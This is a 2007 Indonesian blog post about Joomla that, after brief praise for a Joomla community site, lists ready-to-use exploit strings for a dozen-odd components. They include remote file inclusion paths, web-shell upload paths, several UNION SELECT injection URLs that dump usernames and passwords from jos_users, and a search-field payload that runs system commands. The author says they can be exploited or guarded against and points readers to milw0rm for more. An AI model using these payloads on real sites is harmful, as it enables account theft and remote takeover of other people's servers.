Joomla Gituloh « RFI Vulners Brokencode™

I DO FOLLOW !

Recommendation

Joomla Gituloh « RFI Vulners

By brokencode ⋅ September 16, 2007 ⋅

Email This Post ⋅

Print This Post ⋅ Post a comment

Saya sempat terperangah kagum melihat tampilan, layout, dan performance site id-joomla.com. Fantastic ! Benar-benar clean dan web 2.0 banget ! Salut buat para pengelolanya ! Double thumbs ! Jadi minat ikutan pakai Joomla! Dulu pernah main di Mambo, tapi keseringan di hack orang dan nge-hack punya orang, jadi males . WordPress is still the best ! Bukan dari sisi keamanan, tapi dari sisi struktur, fungsi, SE, dan maintenance.

BTW, id-joomla ngadain contest ya ? “Lomba ini diadakan oleh komunitas http://id-joomla.com sebagai tempat berlatih search engine optimization bagi pengguna pemula joomla dan adu kemampuan untuk master seo (pribadi dan korporat). Seperti diketahui selama ini banyak situs joomla yang sudah di garap secara baik design maupun programmingnya akan tetapi kurang bahkan tidak dioptimasi sehingga situs tidak dapat di jangkau oleh mesin pencari (search engine). Hal ini mengakibatkan biaya dan waktu pengerjaan situs terbuang percuma karena para pengguna internet yang menggunakan mesin pencari tidak menemukan situs kita.” Semoga sukses !

Berikut ini adalah vulner pada beberapa component Joomla! yang dapat dimanfaatkan atau diwaspadai :

Joom!12Pic Component RFI
/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=

Joomla Flash Fun! Component RFI
/administrator/components/com_joomlaflashfun/admin.joomlaflashfun.php?mosConfig_live_site=

Joomla Radio v5 Component RFI
administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=

Joomla Component Restaurante � Remote File Upload Vulnerability
joomla/index.php?option=com_restaurante&task=upload
/joomla/components/com_restaurante/img_original/.shell.php.jpg

Joomla! 1.5 Beta1/Beta2/RC1 Remote SQL Injection Exploit
components/com_content/models/archive.php
components/com_content/models/category.php
components/com_content/models/section.php
Injection sample :
UNION SELECT 0,password,0,0,0,0,0,password,0,username,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,username FROM

Joomla Component BibTeX � 1.3 Remote Blind SQL Injection Vulnerability
Injectin sample :
union select 111,222,333,444,555,1,1,1,1,1,2,3,4,5,6,1,2,3,4,5,3,concat(char(117,115,101,114,110,97,109,101,58),username,char
(32,112,97,115,115,119,111,114,100,58),password),5,4,2,2,2,2,2,0,0,0 from jos_users/*

Joomla Component EventList � 0.8 (did) Remote Blind SQL Injection Vulnerability
Injection sample :
index.php?option=com_eventlist&func=details&did=9999999999999%20union%20select%200,0,concat(char
(117,115,101,114,110,97,109,101,58),username,char(32,112,97,115,115,119,111,114,100,58),password),4,5,6,7,8,9,00,0,444,
555,0,777,0,999,0,0,0,0,0,0,0%20from%20jos_users/*

Joomla Component Nice Talk � 0.9.3 (tagid) Remote Blind SQL Injection Vulnerability
Injection sample :
index.php?option=com_nicetalk&tagid=-2)%20union%20select%201,2,3,4,5,6,7,8,0,999,concat(char
(117,115,101,114,110,97,109,101,58),username,char(32,112,97,115,115,119,111,114,100,58),password)
,777,666,555,444,333,222,111%20from%20jos_users/*

Joomla Component RSfiles � 1.0.2 (path) Remote File Download Vulnerability
index.php?option=com_rsfiles&task=files.display&path=[File]

Joomla Component NeoRecruit � 1.4 (id) Remote Blind SQL Injection Vulnerability
index.php?option=com_neorecruit&task=offer_view&id=[SQL Inject]
Injectin sample :
index.php?option=com_neorecruit&task=offer_view&id=99999999999%20union%20select%201,concat(char
(117,115,101,114,110,97,109,101,58),username,char(32,112,97,115,115,119,111,114,100,58),password)
,3,4,5,6,7,8,111,222,333,444,0,0,0,555,666,777,888,1,2,3,4,5,0%20from%20jos_users/*

Joomla com_gmaps 1.00 Remote SQl Injection
Injection sample :
index.php?option=com_gmaps&task=viewmap&Itemid=57&mapId=-1/**/union/**/select/**/0,
username,password,3,4,5,6,7,8/**/from/**/jos_users/*

Joomla! CMS 1.5 beta 2 (search) Remote Code Execution Vulnerability
index.php?searchword=”;phpinfo();%23&option=com_search&Itemid=1
index.php?c=id&searchword=”;system($_GET[c]);%23&option=com_search&Itemid=1

Joomla Component Pony Gallery � 1.5 Remote Blind SQL Injection Vulnerability
index.php?option=com_ponygallery&Itemid=x&func=viewcategory&catid=[SQL Inject]
Injection sample :
index.php?option=com_ponygallery&Itemid=x&func=viewcategory&catid=%20union%20select%201,2,3,
concat(char(117,115,101,114,110,97,109,101,58),username,char(32,112,97,115,115,119,111,114,100,58),password)
,5,0,0%20from%20jos_users/*

Joomla Component Expose � RC35 Remote Permission Bypass/Arbitrary File Upload Vulnerability
/administrator/components/com_expose/uploadimg.php
/components/com_expose/expose/img/ � where your shell is staying peacefull

… more in milw0rm …

…because blogs are useless self-promotion and mental masturbation… [Lance M. Havok] � I don’t like these words at all !! You suck !

Posting lain yang kemungkinan berhubungan :

Tags: experiment, General Info, Google, Hacking, Internet, Recommendation, SEO, sharing internet

Discussion

3 comments for “Joomla Gituloh « RFI Vulners”

:lol: havok lagi havok lagi biang keladinya :lol:….tapi ada cara ngatasinnya kan om coco :-D kasih pencerahan dong lagi mau mulai experimen pake joomla kemaren ngetes crash :cry:

Posted by pandi merdeka | October 6, 2007, 1:31 pm
untuk component expose saya baca - baca disini bisa di cari solusinya :

http://forum.joomla.org/index.php/topic,192172.0.html

mudah - mudahan bisa membantu

Posted by wahya | October 19, 2007, 5:01 am
Wah lengkap banget nih. Thanks deh infonya

Posted by Belajar dan Berbagi | April 8, 2008, 1:22 pm